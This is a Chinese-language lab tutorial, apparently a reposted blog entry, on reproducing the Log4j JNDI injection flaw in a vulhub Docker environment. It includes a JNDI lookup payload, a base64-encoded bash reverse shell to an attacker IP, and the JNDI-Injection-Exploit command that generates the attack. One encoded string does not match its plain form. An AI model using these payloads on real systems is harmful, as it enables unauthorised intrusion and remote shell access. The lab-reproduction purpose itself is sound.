柚子快報(bào)邀請(qǐng)碼778899分享:log4j反序列化
柚子快報(bào)邀請(qǐng)碼778899分享:log4j反序列化
1.環(huán)境搭建
一臺(tái)kali(靶機(jī)) 一臺(tái)win(攻擊機(jī))
這里kali進(jìn)行換源
# 官方源 # deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolling main non-free contrib #根據(jù)需要自己選一個(gè),中科大的還可以 #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清華大學(xué) #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙大 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #東軟大學(xué) #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib #重慶大學(xué) #deb http://http.kali.org/kali kali-rolling main non-free contrib #deb-src http://http.kali.org/kali kali-rolling main non-free contrib
?進(jìn)入/etc/apt目錄 編輯sources.list文件命令如下
sudo vim sources.list
?將原有的源注釋,添加其他源,這里用的是阿里的
?隨后進(jìn)行更新
apt-get update 更新索引
apt-get upgrade 更新軟件
apt-get dist-upgrade 升級(jí)
apt-get clean 刪除緩存包
apt-get autoclean 刪除未安裝的deb包 普通用戶記得在命令前接上sudo
kali機(jī)安裝docker命令如下
?sudo apt install docker.io root用戶不用加sudo
?安裝docker-compose
sudo apt-get install docker-compose
安裝靶場(chǎng)vulhub
git clone https://github.com/vulhub/vulhub.git
?啟動(dòng)靶場(chǎng)環(huán)境
進(jìn)入靶場(chǎng) cd /vulhub/log4j/你所想打的對(duì)應(yīng)版本 啟動(dòng) docker-compose up -d 查看容器開放端口 docker ps 訪問(wèn)靶場(chǎng),ip加端口訪問(wèn)
?漏洞復(fù)現(xiàn)
?將以下代碼放入url
admin/cores?action=${jndi:ldap://uhd50l.dnslog.cn}
下載工具 JNDI-Injection-Exploit
?Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub
?構(gòu)建反彈shell要經(jīng)過(guò)base64編碼
原碼 bash -i >& /dev/tcp/192.168.0.33/4443 0>&1 編碼后 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzkvNDQ0MyAwPiYx
利用JNDI-Injection-Exploit v1.0生成payload
?java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzMvNDQ0MyAwPiYx}|{base64,-d}|{bash,- i}" -A 192.168.0.33
?
?發(fā)包
柚子快報(bào)邀請(qǐng)碼778899分享:log4j反序列化
參考鏈接
本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點(diǎn)和立場(chǎng)。
轉(zhuǎn)載請(qǐng)注明,如有侵權(quán),聯(lián)系刪除。